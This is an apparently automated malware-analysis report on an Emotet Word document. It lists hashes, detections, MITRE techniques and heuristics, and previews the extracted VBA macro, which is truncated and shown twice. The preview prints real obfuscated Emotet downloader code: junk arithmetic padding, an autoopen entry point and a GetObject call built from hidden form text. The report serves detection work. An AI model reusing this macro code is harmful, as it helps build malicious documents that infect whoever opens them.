Emotet Office (OLE) malware analysis — malicious · 8f55a0fe372f4750

MALICIOUS

Office (OLE)

213.8 KB Created: 2019-04-02 08:47:00 Authoring application: Microsoft Office Word First seen: 2019-05-31

MD5: 67884ee632cec5cecb31dbcc772222f9 SHA-1: 4ba2628864c52edf5f88f42abe5bcb8fe1e1f2b0 SHA-256: 8f55a0fe372f475033bb95db248e1126b0f6012dacc7b75faba46416c214f40b

222 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

The file was detected as malicious by ClamAV with the signature 'Doc.Downloader.Emotet-6922085-0', indicating it is likely part of the Emotet family. High-severity heuristics confirm the presence of an AutoOpen VBA macro that uses GetObject, a common technique for executing malicious code. The VBA script, though heavily obfuscated, is designed to download and execute a second-stage payload, consistent with Emotet's behavior.

Heuristics 7

ClamAV: Doc.Downloader.Emotet-6922085-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-6922085-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
GetObject call high OLE_VBA_GETOBJ

GetObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 32070 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	32070 bytes
SHA-256: `95dd37dad50979953a0a6be2f56c1e6b4ec5338ffdade4a5f9a1172a394ea759`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "rDAAUQAw" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "wZGo4XAx" Attribute VB_Base = "0{0A31E3A4-3702-4AA1-9B48-043C5DB11CF5}{3E3CF29F-23CC-4DF6-B4E7-618369B36E12}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "bAQUC_" Attribute VB_Base = "0{DE6CCDFA-94FE-401B-B295-069D4D6E2465}{E3854AE8-6060-4ECF-AAC5-EB08AF1CC44C}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "RkwUoBo" Function kAB4wAUA() If 777415790 = 60797655 Then jUAUXD = jBQwUX _ + Int(888536219 * Hex(iXwUAAo) + bDQX1A _ / 631181946) + LGwAXZU / CLng(JAGAG1QX) - _ (ZCGBCD - lZ1C4AG / 659773652 - Tan _ (bcUAAkU) + (oAwADCB / CSng(dk1CAAG) + _ 526312991 / Sgn(650647047) * (sDxUwAo + _ CByte(353970196)))) End If If 496451261 = 287831509 Then ZAADAA = toABABA _ + Int(429288972 * Hex(wAG_AAx) + LAAUBUA _ / 662605342) + axQBBC / CLng(mDDAAA) - _ (JUxAwDx - zBXAA1A / 107470544 - Tan _ (dDQkQQ) + (JDXA1Q / CSng(zAcAAx) + _ 164495061 / Sgn(484736760) * (kQ1AXA + _ CByte(604980089)))) End If If 801214778 = 537512672 Then SQkDQc = vAAoDXA1 _ + Int(512106594 * Hex(WxAAAU_) + SBAUxA _ / 913465724) + nGXAGA / CLng(GBDxAx) - _ (pDk1GU - HUDDAoAA / 813607042 - Tan _ (iAAACUkB) + (NQBC1w / CSng(CQD4_kAC) + _ 459304617 / Sgn(904678258) * (rXUAQBAQ + _ CByte(173210471)))) End If End Function Function U1ZAAAB1() If 67181097 = 769911627 Then jBQA1A = nwUAAQAx _ + Int(500058747 * Hex(VA1Q4A) + bAxAkcAX _ / 701201303) + NAwUcAAQ / CLng(DDAABZA) - _ (IXBkACAU - f4DAZAU / 176785618 - Tan _ (w_ZAZ_) + (nQZQBCAA / CSng(pAAABAUB) + _ 723034250 / Sgn(551362184) * (JADxQU + _ CByte(692023770)))) End If If 102666146 = 693360045 Then WUDAAXDD = pQBACw _ + Int(458245214 * Hex(h_UAA1) + mAUAADQA _ / 740346845) + o_AUk41 / CLng(u_w_XZA) - _ (o1kBDAA4 - IA1wADAU / 210794852 - Tan _ (QAUAAAw) + (UAUACx / CSng(FAZQUUA_) + _ 615856733 / Sgn(256754081) * (CAkAk_Q + _ CByte(732680326)))) End If End Function Sub autoopen() VBDAACCG End Sub Function VBDAACCG() On Error Resume Next If 799614944 = 536376509 Then MDcXGQAo = dA4Q1AQ _ + Int(378866859 * Hex(aADCZowA) + c4Ak4_A4 _ / 853515782) + MxUZAoA / CLng(XAQG_A) - _ (kQBAAD - jZCAAXQX / 255064152 - Tan _ (zABxAD4) + (qCAQA1 / CSng(BXXGQQ) + _ 962903447 / Sgn(374481735) * (q1oBAwA + _ CByte(759312173)))) End If If 137345170 = 692763874 Then wkACGAZA = rkAwAAA _ + Int(348527385 * Hex(cAAABDA) + IAAAxDAA _ / 322326423) + Q_xxAwAQ / CLng(cQUAkAc) - _ (iBUDAXX - IcD_1x1 / 101213584 - Tan _ (fDAUZ1) + (zoAAAUC / CSng(jDcAwAo) + _ 599516242 / Sgn(296960448) * (ZG_xUo + _ CByte(780373879)))) End If Set hAGDUG = GetObject(wZGo4XAx.PDAAC_.Text + bAQUC_.wQCQAAAA + wZGo4XAx.PDAAC_.Text) If 695370438 = 564032612 Then w414UDA = tcAABZB _ + Int(837015383 * Hex(UxkAXA) + UDAQ4kQA _ / 513290277) + skCAAUxk / CLng(DAAoZC) - _ (XDAZXAGA - KAAxBcC / 971976311 - Tan _ (ZAAGA4AD) + (FAAwAAA / CSng(PUDDAAZZ) + _ 61785232 / Sgn(430272759) * (aQZAxAAA + _ CByte(587398117)))) End If If 449875966 = 98316657 Then o4DoDk = iAACU1AX _ + Int(241007058 * Hex(NBADAAQ) + w_UAo1AA _ / 191239493) + mkAwGXA / CLng(lCAAUo) - _ (MAAAUA - GBADCc / 983660965 - Tan _ (ikZAGoUA) + (zXAAcc / CSng(HAADDAxB) + _ 626941044 / Sgn(677713363) * (mCwXAA + _ CByte(815657807)))) End If If 361865615 = 995733645 Then mcABDQAA = MwDwDAB _ + Int(630905514 * Hex(z1XAAx) + YAoAQG _ / 344796816) + qACUA4 / CLng(CCDxxAA) - _ (u_AQCDAA - ZAGAoD / 410981544 - Tan _ (pDDU_ABA) + (WGAAAQ ... (truncated)

SHA-256: 95dd37dad50979953a0a6be2f56c1e6b4ec5338ffdade4a5f9a1172a394ea759

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "rDAAUQAw"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "wZGo4XAx"
Attribute VB_Base = "0{0A31E3A4-3702-4AA1-9B48-043C5DB11CF5}{3E3CF29F-23CC-4DF6-B4E7-618369B36E12}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "bAQUC_"
Attribute VB_Base = "0{DE6CCDFA-94FE-401B-B295-069D4D6E2465}{E3854AE8-6060-4ECF-AAC5-EB08AF1CC44C}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "RkwUoBo"
Function kAB4wAUA()
   If 777415790 = 60797655 Then
jUAUXD = jBQwUX _
+ Int(888536219 * Hex(iXwUAAo) + bDQX1A _
/ 631181946) + LGwAXZU / CLng(JAGAG1QX) - _
(ZCGBCD - lZ1C4AG / 659773652 - Tan _
(bcUAAkU) + (oAwADCB / CSng(dk1CAAG) + _
526312991 / Sgn(650647047) * (sDxUwAo + _
CByte(353970196))))
End If
   If 496451261 = 287831509 Then
ZAADAA = toABABA _
+ Int(429288972 * Hex(wAG_AAx) + LAAUBUA _
/ 662605342) + axQBBC / CLng(mDDAAA) - _
(JUxAwDx - zBXAA1A / 107470544 - Tan _
(dDQkQQ) + (JDXA1Q / CSng(zAcAAx) + _
164495061 / Sgn(484736760) * (kQ1AXA + _
CByte(604980089))))
End If
   If 801214778 = 537512672 Then
SQkDQc = vAAoDXA1 _
+ Int(512106594 * Hex(WxAAAU_) + SBAUxA _
/ 913465724) + nGXAGA / CLng(GBDxAx) - _
(pDk1GU - HUDDAoAA / 813607042 - Tan _
(iAAACUkB) + (NQBC1w / CSng(CQD4_kAC) + _
459304617 / Sgn(904678258) * (rXUAQBAQ + _
CByte(173210471))))
End If
End Function
Function U1ZAAAB1()
   If 67181097 = 769911627 Then
jBQA1A = nwUAAQAx _
+ Int(500058747 * Hex(VA1Q4A) + bAxAkcAX _
/ 701201303) + NAwUcAAQ / CLng(DDAABZA) - _
(IXBkACAU - f4DAZAU / 176785618 - Tan _
(w_ZAZ_) + (nQZQBCAA / CSng(pAAABAUB) + _
723034250 / Sgn(551362184) * (JADxQU + _
CByte(692023770))))
End If
   If 102666146 = 693360045 Then
WUDAAXDD = pQBACw _
+ Int(458245214 * Hex(h_UAA1) + mAUAADQA _
/ 740346845) + o_AUk41 / CLng(u_w_XZA) - _
(o1kBDAA4 - IA1wADAU / 210794852 - Tan _
(QAUAAAw) + (UAUACx / CSng(FAZQUUA_) + _
615856733 / Sgn(256754081) * (CAkAk_Q + _
CByte(732680326))))
End If
End Function
Sub autoopen()
VBDAACCG
End Sub
Function VBDAACCG()
On Error Resume Next
   If 799614944 = 536376509 Then
MDcXGQAo = dA4Q1AQ _
+ Int(378866859 * Hex(aADCZowA) + c4Ak4_A4 _
/ 853515782) + MxUZAoA / CLng(XAQG_A) - _
(kQBAAD - jZCAAXQX / 255064152 - Tan _
(zABxAD4) + (qCAQA1 / CSng(BXXGQQ) + _
962903447 / Sgn(374481735) * (q1oBAwA + _
CByte(759312173))))
End If
   If 137345170 = 692763874 Then
wkACGAZA = rkAwAAA _
+ Int(348527385 * Hex(cAAABDA) + IAAAxDAA _
/ 322326423) + Q_xxAwAQ / CLng(cQUAkAc) - _
(iBUDAXX - IcD_1x1 / 101213584 - Tan _
(fDAUZ1) + (zoAAAUC / CSng(jDcAwAo) + _
599516242 / Sgn(296960448) * (ZG_xUo + _
CByte(780373879))))
End If
Set hAGDUG = GetObject(wZGo4XAx.PDAAC_.Text + bAQUC_.wQCQAAAA + wZGo4XAx.PDAAC_.Text)
   If 695370438 = 564032612 Then
w414UDA = tcAABZB _
+ Int(837015383 * Hex(UxkAXA) + UDAQ4kQA _
/ 513290277) + skCAAUxk / CLng(DAAoZC) - _
(XDAZXAGA - KAAxBcC / 971976311 - Tan _
(ZAAGA4AD) + (FAAwAAA / CSng(PUDDAAZZ) + _
61785232 / Sgn(430272759) * (aQZAxAAA + _
CByte(587398117))))
End If
   If 449875966 = 98316657 Then
o4DoDk = iAACU1AX _
+ Int(241007058 * Hex(NBADAAQ) + w_UAo1AA _
/ 191239493) + mkAwGXA / CLng(lCAAUo) - _
(MAAAUA - GBADCc / 983660965 - Tan _
(ikZAGoUA) + (zXAAcc / CSng(HAADDAxB) + _
626941044 / Sgn(677713363) * (mCwXAA + _
CByte(815657807))))
End If
   If 361865615 = 995733645 Then
mcABDQAA = MwDwDAB _
+ Int(630905514 * Hex(z1XAAx) + YAoAQG _
/ 344796816) + qACUA4 / CLng(CCDxxAA) - _
(u_AQCDAA - ZAGAoD / 410981544 - Tan _
(pDDU_ABA) + (WGAAAQ
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.